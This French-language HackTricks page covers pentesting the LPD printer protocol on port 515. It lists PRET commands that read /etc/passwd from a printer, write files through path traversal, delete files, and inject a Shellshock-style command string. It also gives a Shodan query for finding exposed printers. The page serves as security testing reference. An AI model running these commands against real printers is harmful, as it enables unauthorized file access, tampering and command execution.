Le protocole Line Printer Daemon (LPD) a été initialement introduit dans Berkeley Unix dans les années 80 (plus tard spécifié par RFC1179).\ Le démon fonctionne sur le port 515/tcp et peut être accédé en utilisant la commande `lpr`. Pour imprimer, le client envoie un **fichier de contrôle** définissant le travail/nom d'utilisateur et un **fichier de données** contenant les données réelles à imprimer. Le **type d'entrée** du fichier de données peut être défini dans le fichier de contrôle en choisissant parmi **divers formats de fichier**. Cependant, c'est à l'implémentation LPD de décider comment gérer les données d'impression. Une implémentation LPD populaire pour les systèmes d'exploitation de type Unix est LPRng. LPD peut être utilisé comme vecteur pour déployer des **travaux d'impression PostScript** ou **PJL malveillants**. Les outils `lpdprint` et `lpdtest` sont inclus dans [**PRET**](https://github.com/RUB-NDS/PRET)**.** Ils sont un moyen minimaliste d'imprimer des données directement sur une imprimante compatible LPD ou de télécharger/téléverser/supprimer des fichiers et plus encore : ``` lpdprint.py hostname filename lpdtest.py hostname get /etc/passwd lpdtest.py hostname put ../../etc/passwd lpdtest.py hostname rm /some/file/on/printer lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' lpdtest.py hostname mail lpdtest@mailhost.local ``` Si vous voulez en savoir plus sur le piratage d'imprimantes, lisez cette page. # Shodan * `port 515`
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 - Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) ! - Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFT**](https://opensea.io/collection/the-peass-family) - Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com) - **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** - **Partagez vos astuces de piratage en soumettant des PR au repo [hacktricks](https://github.com/carlospolop/hacktricks) et [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.